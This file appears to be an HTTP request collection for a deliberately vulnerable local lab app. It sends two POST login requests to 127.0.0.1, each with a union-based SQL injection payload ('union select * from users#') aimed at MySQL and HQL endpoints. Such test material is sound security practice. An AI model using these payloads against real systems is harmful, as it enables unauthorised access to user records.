###
# case1 mysql select
POST /sql/mysql/case1 HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded

username=xxx' union select * from users#&password=123


###
# case2 hql select
POST /sql/hql/case1 HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded

username=xxx' union select * from users#&password=123


